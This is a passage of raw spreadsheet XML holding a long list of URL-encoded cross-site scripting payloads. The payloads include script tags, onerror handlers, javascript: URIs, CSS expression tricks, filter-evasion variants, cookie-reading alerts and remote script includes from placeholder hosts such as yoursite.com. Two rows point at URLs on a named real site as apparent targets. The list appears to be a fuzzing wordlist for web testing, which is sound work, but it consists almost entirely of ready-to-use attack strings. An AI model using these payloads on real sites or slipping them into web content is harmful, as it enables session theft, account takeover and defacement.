        <v>%3E%3Cimg%20src%3Dx%20onerror%3Dwindow.open%28%27https%3A%2F%2Fwww.google.com%2F%27%29%3B%3E%3Cform%3E%3Cbutton%20formaction%3Djavascript%26colon%3Balert%281%29%3ECLICKME%3Cmath%3E%3Ca%20xlink%3Ahref%3D%2F%2Fjsfiddle.net%2Ft846h%2F%22%3Eclick</v>
      </c>
    </row>
    <row r="2011">
      <c r="A2011" s="3" t="s">
        <v>649</v>
      </c>
      <c r="B2011" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHN2Zy9vbmxvYWQ9YWxlcnQoMik%2B%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="2012">
      <c r="A2012" s="3" t="s">
        <v>650</v>
      </c>
      <c r="B2012" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22data%3Atext%2Fhtml%2C%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2531%2529%253C%252F%2573%2563%2572%2569%2570%2574%253E%22%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="2013">
      <c r="A2013" s="3" t="s">
        <v>651</v>
      </c>
      <c r="B2013" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bblabla%2C%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2332%26%23115%26%23114%26%2399%26%2361%26%2334%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%23115%26%23116%26%23101%26%23114%26%23110%26%23101%26%23102%26%2397%26%23109%26%23105%26%23108%26%23121%26%2346%26%23110%26%23101%26%23116%26%2347%26%23102%26%23111%26%23111%26%2346%26%23106%26%23115%26%2334%26%2362%26%2360%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%238203%22%3EClick%20Me%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="2014">
      <c r="A2014" s="5" t="s">
        <v>462</v>
      </c>
      <c r="B2014" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D</v>
      </c>
    </row>
    <row r="2015">
      <c r="A2015" s="5" t="s">
        <v>1056</v>
      </c>
      <c r="B2015" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%2F%2F%5C%5C%2C%3C%27%3E%22%3E%22%3E%22%2A%22</v>
      </c>
    </row>
    <row r="2016">
      <c r="A2016" s="5" t="s">
        <v>1057</v>
      </c>
      <c r="B2016" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%29%3B%20alert%28%27XSS</v>
      </c>
    </row>
    <row r="2017">
      <c r="A2017" s="3" t="s">
        <v>1058</v>
      </c>
      <c r="B2017" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2018">
      <c r="A2018" s="3" t="s">
        <v>1059</v>
      </c>
      <c r="B2018" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2019">
      <c r="A2019" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B2019" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2020">
      <c r="A2020" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B2020" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="2021">
      <c r="A2021" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B2021" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="2022">
      <c r="A2022" s="3" t="s">
        <v>657</v>
      </c>
      <c r="B2022" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E</v>
      </c>
    </row>
    <row r="2023">
      <c r="A2023" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B2023" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="2024">
      <c r="A2024" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="B2024" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscr%3Cscript%3Eipt%3Ealert%28%27XSS%27%29%3B%3C%2Fscr%3C%2Fscript%3Eipt%3E</v>
      </c>
    </row>
    <row r="2025">
      <c r="A2025" s="3" t="s">
        <v>1061</v>
      </c>
      <c r="B2025" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2026">
      <c r="A2026" s="3" t="s">
        <v>1062</v>
      </c>
      <c r="B2026" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dfoo.png%20onerror%3Dalert%28%2Fxssed%2F%29%20%2F%3E</v>
      </c>
    </row>
    <row r="2027">
      <c r="A2027" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="B2027" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Aalert%28%5C%22XSS%5C%22%29%27%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2028">
      <c r="A2028" s="3" t="s">
        <v>1064</v>
      </c>
      <c r="B2028" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20echo%28%27%3Cscr%29%27%3B%20echo%28%27ipt%3Ealert%28%5C%22XSS%5C%22%29%3C%2Fscript%3E%27%29%3B%20%3F%3E</v>
      </c>
    </row>
    <row r="2029">
      <c r="A2029" s="3" t="s">
        <v>1065</v>
      </c>
      <c r="B2029" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2030">
      <c r="A2030" s="3" t="s">
        <v>1066</v>
      </c>
      <c r="B2030" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%5C%22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E</v>
      </c>
    </row>
    <row r="2031">
      <c r="A2031" s="3" t="s">
        <v>1067</v>
      </c>
      <c r="B2031" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%5C%22jav%26%23x0A%3Bascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E</v>
      </c>
    </row>
    <row r="2032">
      <c r="A2032" s="3" t="s">
        <v>1068</v>
      </c>
      <c r="B2032" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%5C%22jav%26%23x0D%3Bascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E</v>
      </c>
    </row>
    <row r="2033">
      <c r="A2033" s="3" t="s">
        <v>472</v>
      </c>
      <c r="B2033" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E</v>
      </c>
    </row>
    <row r="2034">
      <c r="A2034" s="3" t="s">
        <v>1069</v>
      </c>
      <c r="B2034" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3Cscript%20src%3Dhttp%3A%2F%2Fyoursite.com%2Fyour_files.js%3E%3C%2Fscript%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E%3CIMG%20LOWSRC%3D%5Cjavascript%3Aalert%28%27XSS%27%29%5C%22%3E</v>
      </c>
    </row>
    <row r="2035">
      <c r="A2035" s="3" t="s">
        <v>1070</v>
      </c>
      <c r="B2035" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20DYNSRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%3E</v>
      </c>
    </row>
    <row r="2036">
      <c r="A2036" s="3" t="s">
        <v>1071</v>
      </c>
      <c r="B2036" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cfont%20style%3D%27color%3Aexpression%28alert%28document.cookie%29%29%27%3E</v>
      </c>
    </row>
    <row r="2037">
      <c r="A2037" s="3" t="s">
        <v>1072</v>
      </c>
      <c r="B2037" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="2038">
      <c r="A2038" s="3" t="s">
        <v>1073</v>
      </c>
      <c r="B2038" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20language%3D%22JavaScript%22%3Ealert%28%27XSS%27%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2039">
      <c r="A2039" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="B2039" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onunload%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2040">
      <c r="A2040" s="3" t="s">
        <v>1075</v>
      </c>
      <c r="B2040" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onLoad%3D%22alert%28%27XSS%27%29%3B%22</v>
      </c>
    </row>
    <row r="2041">
      <c r="A2041" s="3" t="s">
        <v>1076</v>
      </c>
      <c r="B2041" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5Bcolor%3Dred%27%20onmouseover%3D%22alert%28%27xss%27%29%22%5Dmouse%20over%5B%2Fcolor%5D</v>
      </c>
    </row>
    <row r="2042">
      <c r="A2042" s="3" t="s">
        <v>1077</v>
      </c>
      <c r="B2042" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg%20src%3D1.gif%20onerror%3Dalert%281%29%3Ewindow.alert%28Bonjour%20%21%22%29%3B</v>
      </c>
    </row>
    <row r="2043">
      <c r="A2043" s="3" t="s">
        <v>1078</v>
      </c>
      <c r="B2043" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22x%3Aexpression%28%28window.r%3D%3D1%29%3F%27%27%3Aeval%28%27r%3D1%3B</v>
      </c>
    </row>
    <row r="2044">
      <c r="A2044" s="3" t="s">
        <v>1079</v>
      </c>
      <c r="B2044" s="4" t="str">
        <f t="shared" si="1"/>
        <v>alert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="2045">
      <c r="A2045" s="3" t="s">
        <v>1080</v>
      </c>
      <c r="B2045" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%3C%3Fphp%20echo%20chr%2811%29%3F%3E%20onload%3Dalert%28%27XSS%27%29%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="2046">
      <c r="A2046" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="B2046" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cscript%20alert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%27%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E%27%3E%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2047">
      <c r="A2047" s="5" t="s">
        <v>1082</v>
      </c>
      <c r="B2047" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2048">
      <c r="A2048" s="3" t="s">
        <v>1083</v>
      </c>
      <c r="B2048" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%5C%22refresh%5C%22%20CONTENT%3D%5C%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E</v>
      </c>
    </row>
    <row r="2049">
      <c r="A2049" s="3" t="s">
        <v>1084</v>
      </c>
      <c r="B2049" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%5C%22refresh%5C%22%20CONTENT%3D%5C%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E</v>
      </c>
    </row>
    <row r="2050">
      <c r="A2050" s="3" t="s">
        <v>1085</v>
      </c>
      <c r="B2050" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Evar%20var%20%3D%201%3B%20alert%28var%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2051">
      <c r="A2051" s="3" t="s">
        <v>515</v>
      </c>
      <c r="B2051" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="2052">
      <c r="A2052" s="3" t="s">
        <v>1086</v>
      </c>
      <c r="B2052" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%3D%27%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%3F%3E</v>
      </c>
    </row>
    <row r="2053">
      <c r="A2053" s="3" t="s">
        <v>1087</v>
      </c>
      <c r="B2053" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%27vbscript%3Amsgbox%28%5C%22XSS%5C%22%29%27%3E</v>
      </c>
    </row>
    <row r="2054">
      <c r="A2054" s="3" t="s">
        <v>1088</v>
      </c>
      <c r="B2054" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%20onfocus%3Dalert%28document.domain%29%20%3E%20%3C%22</v>
      </c>
    </row>
    <row r="2055">
      <c r="A2055" s="3" t="s">
        <v>1089</v>
      </c>
      <c r="B2055" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E%3C%2FFRAMESET%3E</v>
      </c>
    </row>
    <row r="2056">
      <c r="A2056" s="3" t="s">
        <v>1090</v>
      </c>
      <c r="B2056" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3Eli%20%7Blist-style-image%3A%20url%28%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS</v>
      </c>
    </row>
    <row r="2057">
      <c r="A2057" s="3" t="s">
        <v>1091</v>
      </c>
      <c r="B2057" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%27print%20%5C%22%3CSCR%5C0IPT%3Ealert%28%5C%22XSS%5C%22%29%3C%2FSCR%5C0IPT%3E%5C%22%3B%27%20%3E%20out</v>
      </c>
    </row>
    <row r="2058">
      <c r="A2058" s="3" t="s">
        <v>1092</v>
      </c>
      <c r="B2058" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%27print%20%5C%22%3CIMG%20SRC%3Djava%5C0script%3Aalert%28%5C%22XSS%5C%22%29%3E%5C%22%3B%27%20%3E%20out</v>
      </c>
    </row>
    <row r="2059">
      <c r="A2059" s="3" t="s">
        <v>1093</v>
      </c>
      <c r="B2059" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbr%20size%3D%5C%22%26%7Balert%28%27XSS%27%29%7D%5C%22%3E</v>
      </c>
    </row>
    <row r="2060">
      <c r="A2060" s="3" t="s">
        <v>1094</v>
      </c>
      <c r="B2060" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscrscriptipt%3Ealert%281%29%3C%2Fscrscriptipt%3E</v>
      </c>
    </row>
    <row r="2061">
      <c r="A2061" s="3" t="s">
        <v>1095</v>
      </c>
      <c r="B2061" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fbr%20style%3Da%3Aexpression%28alert%28%29%29%3E</v>
      </c>
    </row>
    <row r="2062">
      <c r="A2062" s="3" t="s">
        <v>1096</v>
      </c>
      <c r="B2062" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2063">
      <c r="A2063" s="3" t="s">
        <v>1097</v>
      </c>
      <c r="B2063" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3CBODY%20onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28XSS%22%29%3E</v>
      </c>
    </row>
    <row r="2064">
      <c r="A2064" s="3" t="s">
        <v>1098</v>
      </c>
      <c r="B2064" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5Bcolor%3Dred%20width%3Dexpression%28alert%28123%29%29%5D%5Bcolor%5D</v>
      </c>
    </row>
    <row r="2065">
      <c r="A2065" s="3" t="s">
        <v>531</v>
      </c>
      <c r="B2065" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBASE%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="2066">
      <c r="A2066" s="3" t="s">
        <v>1099</v>
      </c>
      <c r="B2066" s="4" t="str">
        <f t="shared" si="1"/>
        <v>Execute%28MsgBox%28chr%2888%29%26chr%2883%29%26chr%2883%29%29%29%3C</v>
      </c>
    </row>
    <row r="2067">
      <c r="A2067" s="3" t="s">
        <v>1100</v>
      </c>
      <c r="B2067" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3Cbody%20onLoad%3Dwhile%28true%29%20alert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2068">
      <c r="A2068" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="B2068" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281111%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2069">
      <c r="A2069" s="3" t="s">
        <v>1102</v>
      </c>
      <c r="B2069" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Ftextarea%3E%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2070">
      <c r="A2070" s="5" t="s">
        <v>1103</v>
      </c>
      <c r="B2070" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%22%22%3E%3Cscript%20language%3D%22JavaScript%22%3E%20alert%28%27X%20%5CnS%20%5CnS%27%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2071">
      <c r="A2071" s="3" t="s">
        <v>1104</v>
      </c>
      <c r="B2071" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fscript%3E%3C%2Fscript%3E%3C%3C%3C%3Cscript%3E%3C%3E%3E%3E%3E%3C%3C%3Cscript%3Ealert%28123%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2072">
      <c r="A2072" s="3" t="s">
        <v>1105</v>
      </c>
      <c r="B2072" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%3E%3Cnoalert%3E%3Cnoscript%3E%28123%29%3C%2Fnoscript%3E%3Cscript%3E%28123%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2073">
      <c r="A2073" s="3" t="s">
        <v>495</v>
      </c>
      <c r="B2073" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2074">
      <c r="A2074" s="5" t="s">
        <v>1106</v>
      </c>
      <c r="B2074" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3C%2Fselect%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2075">
      <c r="A2075" s="5" t="s">
        <v>1107</v>
      </c>
      <c r="B2075" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%22%3E%3Cscript%20src%20%3D%20%27http%3A%2F%2Fwww.site.com%2FXSS.js%27%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2076">
      <c r="A2076" s="3" t="s">
        <v>1108</v>
      </c>
      <c r="B2076" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%7D%3C%2Fstyle%3E%3Cscript%3Ea%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2077">
      <c r="A2077" s="3" t="s">
        <v>1109</v>
      </c>
      <c r="B2077" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3Edocument.write%28%22XSS%22%29%3B%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="2078">
      <c r="A2078" s="3" t="s">
        <v>1110</v>
      </c>
      <c r="B2078" s="4" t="str">
        <f t="shared" si="1"/>
        <v>a%3D%22get%22%3Bb%3D%22URL%22%3Bc%3D%22javascript%3A%22%3Bd%3D%22alert%28%27xss%27%29%3B%22%3Beval%28a%2Bb%2Bc%2Bd%29%3B</v>
      </c>
    </row>
    <row r="2079">
      <c r="A2079" s="8" t="str">
        <f>'&gt;&lt;script&gt;alert("xss")&lt;/script&gt;</f>
        <v>#ERROR!</v>
      </c>
      <c r="B2079" s="4" t="str">
        <f t="shared" si="1"/>
        <v>#ERROR!</v>
      </c>
    </row>
    <row r="2080">
      <c r="A2080" s="3" t="s">
        <v>1111</v>
      </c>
      <c r="B2080" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Bsrc%3D%22%3E%22%2Bsrc%3D%22http%3A%2F%2Fyoursite.com%2Fxss.js%3F69%2C69%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2081">
      <c r="A2081" s="3" t="s">
        <v>1112</v>
      </c>
      <c r="B2081" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20background%3Djavascript%3A%27%22%3E%3Cscript%3Ealert%28navigator.userAgent%29%3C%2Fscript%3E%3E%3C%2Fbody%3E</v>
      </c>
    </row>
    <row r="2082">
      <c r="A2082" s="3" t="s">
        <v>1113</v>
      </c>
      <c r="B2082" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%2FXaDoS%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript%20src%3Dhttp%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2083">
      <c r="A2083" s="3" t="s">
        <v>1114</v>
      </c>
      <c r="B2083" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%2FKinG-InFeT.NeT%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Esrc%3Dhttp%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2084">
      <c r="A2084" s="3" t="s">
        <v>1115</v>
      </c>
      <c r="B2084" s="4" t="str">
        <f t="shared" si="1"/>
        <v>data%3Atext%2Fhtml%3Bcharset%3Dutf-7%3Bbase64%2CIj48L3RpdGxlPjxzY3JpcHQ%2BYWxlcnQoMTMzNyk8L3NjcmlwdD4%3D</v>
      </c>
    </row>
    <row r="2085">
      <c r="A2085" s="3" t="s">
        <v>1116</v>
      </c>
      <c r="B2085" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%21--%22%20%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2086">
      <c r="A2086" s="3" t="s">
        <v>1117</v>
      </c>
      <c r="B2086" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%28%22XSS%20by%20%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xss%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2087">
      <c r="A2087" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="B2087" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cscript%3Ealert%28XSS%20by%20%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xss%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2088">
      <c r="A2088" s="5" t="s">
        <v>1119</v>
      </c>
      <c r="B2088" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28%22XSS%20by%20%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xss%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2089">
      <c r="A2089" s="3" t="s">
        <v>1120</v>
      </c>
      <c r="B2089" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%22%22%22%3E%3Cscript%3Ealert%28%22XSS%20by%20%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xss%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2090">
      <c r="A2090" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="B2090" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xss%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2091">
      <c r="A2091" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="B2091" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cscript%3Ealert%28%22XSS%20by%20%5Cnxss%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2092">
      <c r="A2092" s="5" t="s">
        <v>1123</v>
      </c>
      <c r="B2092" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xss%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2093">
      <c r="A2093" s="3" t="s">
        <v>1124</v>
      </c>
      <c r="B2093" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22javascript%3Aalert%28%27XSS%20by%20%5Cnxss%27%29%3B%22%3E%3C%2Fiframe%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xss%3C%2Fh1%3E%3C%2Fmarquee%3E</v>
      </c>
    </row>
    <row r="2094">
      <c r="A2094" s="5" t="s">
        <v>1125</v>
      </c>
      <c r="B2094" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cimg%20src%3D%22%22%20alt%3D%27</v>
      </c>
    </row>
    <row r="2095">
      <c r="A2095" s="3" t="s">
        <v>1126</v>
      </c>
      <c r="B2095" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cimg%20src%3D%22%20alt%3D</v>
      </c>
    </row>
    <row r="2096">
      <c r="A2096" s="3" t="s">
        <v>1127</v>
      </c>
      <c r="B2096" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cimg%20src%3D%22%22%20alt%3D%5C%27</v>
      </c>
    </row>
    <row r="2097">
      <c r="A2097" s="3" t="s">
        <v>1128</v>
      </c>
      <c r="B2097" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.simpatie.ro%2Findex.php%3Fpage%3Dfriends%26member%3D781339%26javafunctionname%3DPageclick%26javapgno%3D2%20javapgno%3D2%20%3F%3FXSS%3F%3F</v>
      </c>
    </row>
    <row r="2098">
      <c r="A2098" s="3" t="s">
        <v>1129</v>
      </c>
      <c r="B2098" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.simpatie.ro%2Findex.php%3Fpage%3Dtop_movies%26cat%3D13%26p%3D2%20p%3D2%20%3F%3FXSS%3F%3F</v>
      </c>
    </row>
    <row r="2099">
      <c r="A2099" s="5" t="s">
        <v>1130</v>
      </c>
      <c r="B2099" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%29%3B%20alert%28%27xss%27%29%3B%20var%20x%3D%27</v>
      </c>
